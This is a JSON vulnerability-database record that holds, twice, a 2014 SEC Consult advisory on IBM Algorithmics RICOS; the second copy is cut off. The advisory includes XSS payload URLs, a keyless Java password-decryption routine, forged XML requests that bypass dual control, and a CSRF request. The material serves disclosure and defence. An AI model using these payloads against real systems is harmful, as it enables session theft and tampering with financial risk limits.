1, "cvss3": {}, "published": "2014-10-16T00:00:00", "title": "SEC Consult SA-20140630-0 :: Multiple vulnerabilities in IBM Algorithmics RICOS", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0867", "CVE-2014-0870", "CVE-2014-0871", "CVE-2014-0868", "CVE-2014-0894", "CVE-2014-0869", "CVE-2014-0865", "CVE-2014-0866", "CVE-2014-0864"], "modified": "2014-10-16T00:00:00", "id": "SECURITYVULNS:DOC:31286", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31286", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:46:23", "description": "Information leakage, crossite scripting, CSRF, privilege escalation, unauthorized accesss.", "edition": 2, "cvss3": {}, "published": "2014-10-16T00:00:00", "type": "securityvulns", "title": "IBM Algorithmics RICOS multiple security vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0867", "CVE-2014-0870", "CVE-2014-0871", "CVE-2014-0868", "CVE-2014-0894", "CVE-2014-0869", "CVE-2014-0865", "CVE-2014-0866", "CVE-2014-0864"], "modified": "2014-10-16T00:00:00", "id": "SECURITYVULNS:VULN:14038", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14038", "sourceData": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T13:21:36", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-02T00:00:00", "type": "seebug", "title": "IBM Algorithmics RICOS 4.5.0 - 4.7.0 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0864", "CVE-2014-0865", "CVE-2014-0866", "CVE-2014-0867", "CVE-2014-0868", "CVE-2014-0869", "CVE-2014-0870", "CVE-2014-0871", "CVE-2014-0894"], "modified": "2014-07-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87112", "id": "SSV:87112", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n \r\nSEC Consult Vulnerability Lab Security Advisory < 20140630-0 >\r\n=======================================================================\r\n title: Multiple severe vulnerabilities\r\n product: IBM Algorithmics RICOS\r\n vulnerable version: 4.5.0 - 4.7.0\r\n fixed version: 4.7.0.03\r\n CVE number: CVE-2014-0894\r\n CVE-2014-0871\r\n CVE-2014-0870\r\n CVE-2014-0869\r\n CVE-2014-0868\r\n CVE-2014-0867\r\n CVE-2014-0866\r\n CVE-2014-0865\r\n CVE-2014-0864\r\n impact: critical\r\n homepage: http://www-01.ibm.com/software/analytics/algorithmics/\r\n found: 2013-12-19\r\n by: A. Kolmann, V. Habsburg-Lothringen, F. Lukavsky\r\n SEC Consult Vulnerability Lab\r\n https://www.sec-consult.com\r\n=======================================================================\r\n \r\nVendor description:\r\n- -------------------\r\nIBM Algorithmics software enables financial institutions and corporate\r\ntreasuries to make risk-aware business decisions. Supported by a global\r\nteam of risk experts based in all major financial centers, IBM\r\nAlgorithmics solution offerings include market, credit and liquidity risk,\r\nas well as collateral and capital management.\r\n \r\nSource: http://www-01.ibm.com/software/analytics/algorithmics/\r\n \r\nRICOS is a pre-deal limit management solution part of the Algo Suite.\r\n \r\n \r\nBusiness recommendation:\r\n- ------------------------\r\nThe identified vulnerabilities affect integrity and confidentiality of the\r\nrisk management system. SEC Consult does not recommend to rely on RICOS as\r\npart of risk management until a thorough security review has been performed\r\nby security professionals. As a workaround, access should be limited only to\r\ntrusted users internally and sample checks regarding the plausibility of limits\r\nshould be performed manually.\r\n \r\n \r\nVulnerability overview/description:\r\n- -----------------------------------\r\n1) Information Disclosure (PSIRT#1440 / CVE-2014-0871 / CVSS 4.3)\r\nThe Tomcat configuration discloses technical details within error messages to\r\nthe user, which allows an attacker to collect valuable data about the\r\nenvironment of the solution.\r\n \r\n2) Password Disclosure (PSIRT#1441 / CVE-2014-0894 / CVSS 3.5)\r\nThe password and the username of the backend database are disclosed in\r\nclear-text to the user of the web application. This allows attackers to\r\ndirectly connect to the backend database and manipulate arbitrary data stored\r\nin the database (e.g. limits).\r\n \r\n3) Non-permanent Cross-Site Scripting (PSIRT#1442 / CVE-2014-0870 / CVSS 4.3)\r\nSeveral parameters in the RICOS web front end and the Blotter are not properly\r\nsanitized and cause Cross-Site Scripting vulnerabilities. Attackers can steal\r\nuser sessions and impersonate other users while performing arbitrary actions\r\non behalf of the victim user.\r\n \r\n4) Broken Encryption (PSIRT#1443 / CVE-2014-0869 / CVSS 4.3)\r\nWeak cryptographic algorithms, being used to store and transfer\r\nuser's passwords, allow an attacker to retrieve the plain-text passwords\r\nwithout further knowledge of cryptographic keys.\r\n \r\n5) Manipulation of read-only data / dual control mechanism bypass (PSIRT#1444 / CVE-2014-0868 /\r\nCVSS 3.5)\r\nSeveral fields of stored data within RICOS are marked as read-only in the web\r\napplication, disallowing modification of certain fields. These checks are only\r\nperformed client-side, allowing an attacker to alter arbitrary data. An\r\nattacker can create a limit, alter the username of the created limit and\r\nconfirm the limit himself, circumventing dual control mechanisms advertised by\r\nRICOS.\r\n \r\n6) Cross-Site Cookie Setting (PSIRT#1445 / CVE-2014-0867 / CVSS 4.3)\r\nA vulnerable page in RICOS allows an attacker to set and overwrite arbitrary\r\ncookies for a user that clicks on a manipulated link.\r\n \r\n7) Plain-text submission of passwords (PSIRT#1446 / CVE-2014-0866 / CVSS 4.3)\r\nThe RICOS fat client submits user credentials in plain-text. An attacker with\r\naccess to the network communication can perform man-in-the-middle attacks and\r\nsteal user credentials.\r\nThis vulnerability also applies to the Blotter, where authentication is\r\nperformed unencrypted.\r\n \r\n8) Client-side Input Validation (PSIRT#1447 / CVE-2014-0865 / CVSS 3.5)\r\nThe RICOS fat client performs input validation only client-side. This allows\r\nan attacker to alter arbitrary data. An attacker can create a limit, alter\r\nthe username of the created limit and confirm the limit himself, circumventing\r\ndual control mechanisms advertised by RICOS.\r\n \r\n9) Cross-Site Request Forgery (PSIRT#1448 / CVE-2014-0864 / CVSS 4.3)\r\nThe web application does not verify that requests are made only from within\r\nthe web application, allowing an attacker to trick users into performing\r\nrequests to the web application. This allows an attacker to perform tasks on\r\nbehalf of the victim user like modifying limits.\r\n \r\n \r\nProof of concept:\r\n- -----------------\r\n1) Information Disclosure\r\nThe following URL causes a status 404, disclosing the Tomcat version:\r\nhttps://ricos/ricos470/classes/\r\n \r\nIf control characters (i.e. \\x00) are sent as part of the cookie, a stack trace\r\nis triggered\r\n \r\n2) Password Disclosure\r\nThe following request sent by the client during regular communication shows the\r\ndatabase connection settings including the username and the password in\r\nclear-text.\r\n \r\nPOST /ricos470/Executer HTTP/1.1\r\nHost: ricos\r\n \r\n...SNIP...\r\n<i n="URN" v=""/><i n="SecServiceURN" v="obsv2:ricos:20100"/><i n="SecSource" v="LM web"/><i\r\nn="SecTimeout" v="7200"/><i n="AcsAutoReconnect" v="Y"/><i n="AcsFunctionLimits" v=""/></t><t\r\nn="ObServer"><i n="UserId" v=""/><i n="Password" v=""/><i n="Host" v="ricos"/><i n="Port"\r\nv="20100"/><i n="CollectionId" v=""/><i n="DbName" v="RICA"/><i n="Location" v="RICA"/><i\r\nn="DbType" v="ORA"/><i n="Application" v="RICOS"/><i n="AppId" v="LM web"/><i n="AppDesc" v=""/><i\r\nn="AppVer" v="4.7.0"/><i n="Component" v="RICOS Gui"/><i n="DbUser" v="rica"/><i n="DbPass"\r\nv="password"/>\r\n...SNIP...\r\n \r\n3) Non-permanent Cross-Site Scripting\r\nThe following URLs demonstrate Cross-Site Scripting vulnerabilities:\r\n \r\nPOST /ricos470/rcore6/main/showerror.jsp HTTP/1.1\r\nHost: ricos\r\n \r\nMessage=<script>alert(document.cookie)</script>%0D%0A&Stack=java.lang....\r\n \r\nhttps://ricos/ricos470/rcore6/main/buttonset.jsp?ButtonsetClass=x";+alert(document.cookie);//x\r\n \r\nhttps://ricos/ricos470/rcore6/frameset.jsp?PROF_NAME=&Caller=login&ChildBrowser=Y&MiniBrowse=Y&OBJECT=profile_login&CAPTION_SELECT=MNU_PROFILE_VIEW&MBName=profile_login')");alert(document.cookie);//\r\n \r\nhttp://ricos/algopds/rcore6/main/browse.jsp?Init=N";alert(document.cookie)&Name=trades&StoreName=trades&HandlerFrame=Caption&ShowStatus=N&HasMargin=Y\r\n \r\n \r\nhttp://ricos/algopds/rcore6/main/ibrowseheader.jsp?Name=trades;alert(document.cookie)&StoreName=trades;alert(document.cookie)&STYLESHEET=browse"/><script>alert(document.cookie)</script>\r\n \r\n4) Broken Encryption\r\nThe user's password is transported frequently in requests within the application.\r\nThe following function decrypts the password without requiring any cryptographic key:\r\n \r\npublic static void decrypt(String string)\r\n{\r\n int nRadix = 32;\r\n int nR2 = nRadix * nRadix / 2;\r\n GregorianCalendar cal = new GregorianCalendar();\r\n String key = string.substring(0, 2);\r\n int nKey = Integer.parseInt(key, 32);\r\n \r\n String encPw = string.substring(2, string.length());\r\n int y = 0;\r\n for (int i = 0; i < encPw.length(); i+=2)\r\n {\r\n String aktuell = encPw.substring(i,i+2); \r\n int new_value = Integer.parseInt(aktuell, 32);\r\n int character = - nKey * (y + 1) % nR2 + new_value;\r\n char decrypt = (char) character;\r\n System.out.print(decrypt);\r\n y = y + 1;\r\n } \r\n}\r\n \r\n5) Manipulation of read-only data / dual control mechanism bypass\r\nThe following example illustrates how to manipulate a request so that the server\r\nsaves it on behalf of another user (only the relevant parts are shown):\r\n \r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<ds>\r\n <t n="Service">\r\n <i n="RequestType" v="#Action"/>\r\n <t n="#ActionData">\r\n <i n="#ActionName" v="web.getmeta_udf"/>\r\n <i n="#Mode" v="#Sync"/>\r\n <i n="#Request" v="#Execute"/>\r\n <t n="#OutputData">\r\n <t n="#MapTable">\r\n <i n="#ResultData" v="#ResultData"/>\r\n <i n="#ResultTable" v="#ResultTable"/>\r\n </t>\r\n </t>\r\n <t n="#InputData">\r\n <t n="#WorkTable">\r\n <t n="det_limit">\r\n <i n="SCTYGEID" v="A"/>\r\n[...]\r\n <i n="LMLCURID" v="other_user"/>\r\n <i n="LMEQEPSTDA" v=""/>\r\n[...]\r\n <i n="MFURID" v="other_user"/>\r\n <i n="LMEVFL" v="N"/>\r\n <i n="SOLMFL" v="N"/>\r\n[...]\r\n <i n="CRURID" v="other_user"/>\r\n <i n="MFTS" v=""/>\r\n <i n="MFURID" v="other_user"/>\r\n[...]\r\n <i n="CRURID" v="other_user"/>\r\n <i n="MFTS" v=""/>\r\n[...]\r\n </t>\r\n <t n="Session">\r\n <t n="SessionData">\r\n <i n="LoginUser" v="other_user"/>\r\n <i n="LoginPass" v="8HC34BCM5JE84ND95RED"/>\r\n[...]\r\n <i n="LoginUser v="other_user"/>\r\n <i n="LoginPWD" v="326K9DC9FNIT3T70A3D6"/>\r\n <i n="URN" v=""/>\r\n <i n="SecServiceURN" v="obsv2:ricos:20100"/>\r\n[...]\r\n </t>\r\n <t n="ObServer">\r\n <i n="UserId" v="other_user"/>\r\n <i n="Password" v=""/>\r\n <i n="Host" v="ricos"/>\r\n[...]\r\n <i n="Prefix" v="RICA"/>\r\n <i n="DbSystem" v="oracle"/>\r\n <i n="LoginUserId" v="other_user"/>\r\n </t>\r\n </t>\r\n </t>\r\n</ds>\r\n \r\n6) Cross-Site Cookie Setting\r\nThe following URL allows setting of arbitrary cookies:\r\n \r\nhttps://ricos/ricos470/rcore6/main/addcookie.jsp?test-cookie=cookie-content\r\n \r\n7) Plain-text submission of passwords\r\nNeither the fat client nor the Blotter use https to communicate with the\r\nbackend server. Both send unencrypted credentials via http during authentication.\r\n \r\n8) Client-side Input Validation\r\nBy manipulating serialized objects that are transmitted by the fat client,\r\nit is possible to change the user name who created a limit, allowing an attacker\r\nto bypass dual control mechanisms.\r\n \r\n9) Cross-Site Request Forgery\r\nThe following request, sent on behalf of an authenticated user will e.g.\r\nchange the currency of a given deal:\r\n \r\nPOST http://ricos/ricos470/Executer HTTP/1.1\r\nHost: ricos\r\n \r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<ds>\r\n <t n="Service">\r\n <i n="RequestType" v="#Action"/>\r\n <t n="#ActionData">\r\n <i n="#ActionName" v="web.updrec_msp"/>\r\n <i n="#Mode" v="#Sync"/>\r\n <i n="#Request" v="#Execute"/>\r\n <t n="#InputData">\r\n <t n="#MapTable">\r\n <i n="#InputData" v="det_msp"/>\r\n </t>\r\n <t n="#WorkTable">\r\n <t n="det_msp">\r\n <i n="SYPMID" v="SYS-PAR-ID"/>\r\n <i n="CUCD" v="USD"/>\r\n <i n="MIGORILV" v="11"/>\r\n <i n="ILPLMVFL" v="Y"/>\r\n <i n="ILNEMVFL" v="Y"/>\r\n <i n="BSCUONFL" v="N"/>\r\n <i n="PBSCUOFL" v="N"/>\r\n <i n="LORICUTEFL" v="N"/>\r\n <i n="SYSAVAILFL" v="F"/> \r\n <i n="CUSTID" v="CUSTOMER"/>\r\n <i n="CBNALI" v="IS-LOCATED-IN"/>\r\n <i n="CBNAAG" v="AUTOMATIC-GROUP"/>\r\n <i n="UDF1" v="Welcome to ricos 4.71"/>\r\n </t>\r\n...SNIP...\r\n \r\n \r\nVulnerable / tested versions:\r\n- -----------------------------\r\nIBM Algorithmics RICOS 4.71\r\n \r\n \r\nVendor contact timeline:\r\n- ------------------------\r\n2014-01-24: Contacting vendor through psirt@vnet.ibm.com\r\n2014-01-24: Vendor response, will likely require more than 30 days to resolve issues\r\n asking for acknowledgements\r\n2014-01-24: Sending acknowledgements\r\n2014-01-29: Vendor assigns PSIRT advisory numbers 1440-1448 to reported issues\r\n2014-02-07: Vendor confirms 8 of 9 vulnerabilities and sends CVE and CVSS\r\n2014-02-10: Providing further information on assumed to be false positive issue 1441\r\n2014-02-14: Telco to clarify vulnerability details and agree on further procedure\r\n patches are scheduled for end of June 2014\r\n2014-02-20: Vendor confirms issue 1441 to be a vulnerability\r\n2014-05-27: Vendor announces that patches will be released on 2014-06-30\r\n2014-06-26: Vendor published patches and security bulletin\r\n https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881\r\n2014-06-30: SEC Consult publishes the advisory\r\n \r\n \r\nSolution:\r\n- ---------\r\nApply patch ACLM 4.7.0.03 FP5. More information:\r\nhttps://www-304.ibm.com/support/entdocview.wss?uid=swg21675881\r\n \r\n \r\nWorkaround:\r\n- -----------\r\nLimit access to RICOS and manually perform sample checks regarding the\r\nplausibility of limits.\r\n \r\n \r\nAdvisory URL:\r\n- -------------\r\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\r\n \r\n \r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nSEC Consult Vulnerability Lab\r\n \r\nSEC Consult\r\nVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius\r\n \r\nHeadquarter:\r\nMooslackengasse 17, 1190 Vienna, Austria\r\nPhone: +43 1 8903043 0\r\nFax: +43 1 8903043 15\r\n \r\nMail: research at sec-consult dot com\r\nWeb: https://www.sec-consult.com\r\nBlog: http://blog.sec-consult.com\r\nTwitter: https://twitter.com/sec_consult\r\n \r\nInterested to work with the experts of SEC Consult?\r\nWrite to career@sec-consult.com\r\n \r\nEOF F. Lukavsky / @2014\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\nComment: Using GnuPG with Thunderbird - http://www.enigmail.net/\r\n \r\niQEcBAEBAgAGBQJTsZDnAAoJECyFJyAEdlkKDUIH/3d/PLRdTNA9EludLlr7M+K+\r\nuaBxgyajy8sT7dYMedR3EcxKxZSUGExnv+2X4GZN0Px8a9NvEewURIAiM+ZAsdYg\r\nuFKPtYcuhO6TyKV/QoPUsixEM3IgzyMpGqcf2qtWqNOb4jVpXvtyO2gLoHQNj04F\r\nuQl0v+1it2HNVxd6vEj2zj7neuOLb3WhE6ObDAlVkzcOutvTF84cVyNYpBBuCD6e\r\n0TsopvfkJ3l6iJPSvgXpl1gTmSoR0PfEC14JYVKCK0pTbhXc81J8YYGQnEklWazl\r\nEEUoMVM0I6Yzg9oXGpHf5cBX49pbzAYm5lhJkCDiSQ+2ueSYN0BEz3e2JMtDEZ8=\r\n=OFL7\r\n-----END PGP SIGNATURE-----\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87112", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:20", "description": "\nIBM Algorithmics RICOS 4.5.0 4.7.0 - Multiple Vulnerabilities", "edition": 2, "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "IBM Algorithmics RICOS 4.5.0 4.7.0 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0867", "CVE-2014-0870", "CVE-2014-0871", "CVE-2014-0868", "CVE-2014-0894", "CVE-2014-0869", "CVE-2014-0865", "CVE-2014-0866", "CVE-2014-0864"], "modified": "2014-07-01T00:00:00", "id": "EXPLOITPACK:9C48C6D849BFEE90F78DF671DAF658A8", "href": "", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nSEC Consult Vulnerability Lab Security Advisory < 20140630-0 >\n=======================================================================\n title: Multiple severe vulnerabilities\n product: IBM Algorithmics RICOS\n vulnerable version: 4.5.0 - 4.7.0\n fixed version: 4.7.0.03\n CVE number: CVE-2014-0894\n CVE-2014-0871\n CVE-2014-0870\n CVE-2014-0869\n CVE-2014-0868\n CVE-2014-0867\n CVE-2014-0866\n CVE-2014-0865\n CVE-2014-0864\n impact: critical\n homepage: http://www-01.ibm.com/software/analytics/algorithmics/\n found: 2013-12-19\n by: A. Kolmann, V. Habsburg-Lothringen, F. Lukavsky\n SEC Consult Vulnerability Lab\n https://www.sec-consult.com\n=======================================================================\n\nVendor description:\n- -------------------\nIBM Algorithmics software enables financial institutions and corporate\ntreasuries to make risk-aware business decisions. Supported by a global\nteam of risk experts based in all major financial centers, IBM\nAlgorithmics solution offerings include market, credit and liquidity risk,\nas well as collateral and capital management.\n\nSource: http://www-01.ibm.com/software/analytics/algorithmics/\n\nRICOS is a pre-deal limit management solution part of the Algo Suite.\n\n\nBusiness recommendation:\n- ------------------------\nThe identified vulnerabilities affect integrity and confidentiality of the\nrisk management system. SEC Consult does not recommend to rely on RICOS as\npart of risk management until a thorough security review has been performed\nby security professionals. As a workaround, access should be limited only to\ntrusted users internally and sample checks regarding the plausibility of limits\nshould be performed manually.\n\n\nVulnerability overview/description:\n- -----------------------------------\n1) Information Disclosure (PSIRT#1440 / CVE-2014-0871 / CVSS 4.3)\nThe Tomcat configuration discloses technical details within error messages to\nthe user, which allows an attacker to collect valuable data about the\nenvironment of the solution.\n\n2) Password Disclosure (PSIRT#1441 / CVE-2014-0894 / CVSS 3.5)\nThe password and the username of the backend database are disclosed in\nclear-text to the user of the web application. This allows attackers to\ndirectly connect to the backend database and manipulate arbitrary data stored\nin the database (e.g. limits).\n\n3) Non-permanent Cross-Site Scripting (PSIRT#1442 / CVE-2014-0870 / CVSS 4.3)\nSeveral parameters in the RICOS web front end and the Blotter are not properly\nsanitized and cause Cross-Site Scripting vulnerabilities. Attackers can steal\nuser sessions and impersonate other users while performing arbitrary actions\non behalf of the victim user.\n\n4) Broken Encryption (PSIRT#1443 / CVE-2014-0869 / CVSS 4.3)\nWeak cryptographic algorithms, being used to store and transfer\nuser's passwords, allow an attacker to retrieve the plain-text passwords\nwithout further knowledge of cryptographic keys.\n\n5) Manipulation of read-only data / dual control mechanism bypass (PSIRT#1444 / CVE-2014-0868 /\nCVSS 3.5)\nSeveral fields of stored data within RICOS are marked as read-only in the web\napplication, disallowing modification of certain fields. These checks are only\nperformed client-side, allowing an attacker to alter arbitrary data. An\nattacker can create a limit, alter the username of the created limit and\nconfirm the limit himself, circumventing dual control mechanisms advertised by\nRICOS.\n\n6) Cross-Site Cookie Setting (PSIRT#1445 / CVE-2014-0867 / CVSS 4.3)\nA vulnerable page in RICOS allows an attacker to set and overwrite arbitrary\ncookies for a user that clicks on a manipulated link.\n\n7) Plain-text submission of passwords (PSIRT#1446 / CVE-2014-0866 / CVSS 4.3)\nThe RICOS fat client submits user credentials in plain-text. An attacker with\naccess to the network communication can perform man-in-the-middle attacks and\nsteal user credentials.\nThis vulnerability also applies to the Blotter, where authentication is\nperformed unencrypted.\n\n8) Client-side Input Validation (PSIRT#1447 / CVE-2014-0865 / CVSS 3.5)\nThe RICOS fat client performs input validation only client-side. This allows\nan attacker to alter arbitrary data. An attacker can create a limit, alter\nthe username of the created limit and confirm the limit himself, circumventing\ndual control mechanisms advertised by RICOS.\n\n9) Cross-Site Request Forgery (PSIRT#1448 / CVE-2014-0864 / CVSS 4.3)\nThe web application does not verify that requests are made only from within\nthe web application, allowing an attacker to trick users into performing\nrequests to the web application. This allows an attacker to perform tasks on\nbehalf of the victim user like modifying limits.\n\n\nProof of concept:\n- -----------------\n1) Information Disclosure\nThe following URL causes a status 404, disclosing the Tomcat version:\nhttps://ricos/ricos470/classes/\n\nIf control characters (i.e. \\x00) are sent as part of the cookie, a stack trace\nis triggered\n\n2) Password Disclosure\nThe following request sent by the client during regular communication shows the\ndatabase connection settings including the username and the password in\nclear-text.\n\nPOST /ricos470/Executer HTTP/1.1\nHost: ricos\n\n...SNIP...\n<i n=\"URN\" v=\"\"/><i n=\"SecServiceURN\" v=\"obsv2:ricos:20100\"/><i n=\"SecSource\" v=\"LM web\"/><i\nn=\"SecTimeout\" v=\"7200\"/><i n=\"AcsAutoReconnect\" v=\"Y\"/><i n=\"AcsFunctionLimits\" v=\"\"/></t><t\nn=\"ObServer\"><i n=\"UserId\" v=\"\"/><i n=\"Password\" v=\"\"/><i n=\"Host\" v=\"ricos\"/><i n=\"Port\"\nv=\"20100\"/><i n=\"CollectionId\" v=\"\"/><i n=\"DbName\" v=\"RICA\"/><i n=\"Location\" v=\"RICA\"/><i\nn=\"DbType\" v=\"ORA\"/><i n=\"Application\" v=\"RICOS\"/><i n=\"AppId\" v=\"LM web\"/><i n=\"AppDesc\" v=\"\"/><i\nn=\"AppVer\" v=\"4.7.0\"/><i n=\"Component\" v=\"RICOS Gui\"/><i n=\"DbUser\" v=\"rica\"/><i n=\"DbPass\"\nv=\"password\"/>\n...SNIP...\n\n3) Non-permanent Cross-Site Scripting\nThe following URLs demonstrate Cross-Site Scripting vulnerabilities:\n\nPOST /ricos470/rcore6/main/showerror.jsp HTTP/1.1\nHost: ricos\n\nMessage=<script>alert(document.cookie)</script>%0D%0A&Stack=java.lang....\n\nhttps://ricos/ricos470/rcore6/main/buttonset.jsp?ButtonsetClass=x\";+alert(document.cookie);//x\n\nhttps://ricos/ricos470/rcore6/frameset.jsp?PROF_NAME=&Caller=login&ChildBrowser=Y&MiniBrowse=Y&OBJECT=profile_login&CAPTION_SELECT=MNU_PROFILE_VIEW&MBName=profile_login')\");alert(document.cookie);//\n\nhttp://ricos/algopds/rcore6/main/browse.jsp?Init=N\";alert(document.cookie)&Name=trades&StoreName=trades&HandlerFrame=Caption&ShowStatus=N&HasMargin=Y\n\n\nhttp://ricos/algopds/rcore6/main/ibrowseheader.jsp?Name=trades;alert(document.cookie)&StoreName=trades;alert(document.cookie)&STYLESHEET=browse\"/><script>alert(document.cookie)</script>\n\n4) Broken Encryption\nThe user's password is transported frequently in requests within the application.\nThe following function decrypts the password without requiring any cryptographic key:\n\npublic static void decrypt(String string)\n{\n int nRadix = 32;\n int nR2 = nRadix * nRadix / 2;\n GregorianCalendar cal = new GregorianCalendar();\n String key = string.substring(0, 2);\n int nKey = Integer.parseInt(key, 32);\n \n String encPw = string.substring(2, string.length());\n int y = 0;\n for (int i = 0; i < encPw.length(); i+=2)\n {\n String aktuell = encPw.substring(i,i+2); \n int new_value = Integer.parseInt(aktuell, 32);\n int character = - nKey * (y + 1) % nR2 + new_value;\n char decrypt = (char) character;\n System.out.print(decrypt);\n y = y + 1;\n } \n}\n\n5) Manipulation of read-only data / dual control mechanism bypass\nThe following example illustrates how to manipulate a request so that the server\nsaves it on behalf of another user (only the relevant parts are shown):\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<ds>\n <t n=\"Service\">\n <i n=\"RequestType\" v=\"#Action\"/>\n <t n=\"#ActionData\">\n <i n=\"#ActionName\" v=\"web.getmeta_udf\"/>\n <i n=\"#Mode\" v=\"#Sync\"/>\n <i n=\"#Request\" v=\"#Execute\"/>\n <t n=\"#OutputData\">\n <t n=\"#MapTable\">\n <i n=\"#ResultData\" v=\"#ResultData\"/>\n <i n=\"#ResultTable\" v=\"#ResultTable\"/>\n </t>\n </t>\n <t n=\"#InputData\">\n <t n=\"#WorkTable\">\n <t n=\"det_limit\">\n <i n=\"SCTYGEID\" v=\"A\"/>\n[...]\n <i n=\"LMLCURID\" v=\"other_user\"/>\n <i n=\"LMEQEPSTDA\" v=\"\"/>\n[...]\n <i n=\"MFURID\" v=\"other_user\"/>\n <i n=\"LMEVFL\" v=\"N\"/>\n <i n=\"SOLMFL\" v=\"N\"/>\n[...]\n <i n=\"CRURID\" v=\"other_user\"/>\n <i n=\"MFTS\" v=\"\"/>\n <i n=\"MFURID\" v=\"other_user\"/>\n[...]\n <i n=\"CRURID\" v=\"other_user\"/>\n <i n=\"MFTS\" v=\"\"/>\n[...]\n </t>\n <t n=\"Session\">\n <t n=\"SessionData\">\n <i n=\"LoginUser\" v=\"other_user\"/>\n <i n=\"LoginPass\" v=\"8HC34BCM5JE84ND95RED\"/>\n[...]\n <i n=\"LoginUser v=\"other_user\"/>\n <i n=\"LoginPWD\" v=\"326K9DC9FNIT3T70A3D6\"/>\n <i n=\"URN\" v=\"\"/>\n <i n=\"SecServiceURN\" v=\"obsv2:ricos:20100\"/>\n[...]\n </t>\n <t n=\"ObServer\">\n <i n=\"UserId\" v=\"other_user\"/>\n <i n=\"Password\" v=\"\"/>\n <i n=\"Host\" v=\"ricos\"/>\n[...]\n <i n=\"Prefix\" v=\"RICA\"/>\n <i n=\"DbSystem\" v=\"oracle\"/>\n <i n=\"LoginUserId\" v=\"other_user\"/>\n </t>\n </t>\n </t>\n</ds>\n\n6) Cross-Site Cookie Setting\nThe following URL allows setting of arbitrary cookies:\n\nhttps://ricos/ricos470/rcore6/main/addcookie.jsp?test-cookie=cookie-content\n\n7) Plain-text submission of passwords\nNeither the fat client nor the Blotter use https to communicate with the\nbackend server. Both send unencrypted credentials via http during authentication.\n\n8) Client-side Input Validation\nBy manipulating serialized objects that are transmitted by the fat client,\nit is possible to change the user name who created a limit, allowing an attacker\nto bypass dual control mechanisms.\n\n9) Cross-Site Request Forgery\nThe following request, sent on behalf of an authenticated user will e.g.\nchange the currency of a given deal:\n\nPOST http://ricos/ricos470/Executer HTTP/1.1\nHost: ricos\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<ds>\n <t n=\"Service\">\n <i n=\"RequestType\" v=\"#Action\"/>\n <t n=\"#ActionData\">\n <i n=\"#ActionName\" v=\"web.updrec_msp\"/>\n <i n=\"#Mode\" v=\"#Sync\"/>\n <i n=\"#Request\" v=\"#Execute\"/>\n <t n=\"#InputData\">\n <t n=\"#MapTable\">\n <i n=\"#InputData\" v=\"det_msp\"/>\n </t>\n <t n=\"#WorkTable\">\n <t n=\"det_msp\">\n <i n=\"SYPMID\" v=\"SYS-PAR-ID\"/>\n <i n=\"CUCD\" v=\"USD\"/>\n <i n=\"MIGORILV\" v=\"11\"/>\n <i n=\"ILPLMVFL\" v=\"Y\"/>\n <i n=\"ILNEMVFL\" v=\"Y\"/>\n <i n=\"BSCUONFL\" v=\"N\"/>\n <i n=\"PBSCUOFL\" v=\"N\"/>\n <i n=\"LORICUTEFL\" v=\"N\"/>\n <i n=\"SYSAVAILFL\" v=\"F\"/> \n <i n=\"CUSTID\" v=\"CUSTOMER\"/>\n <i 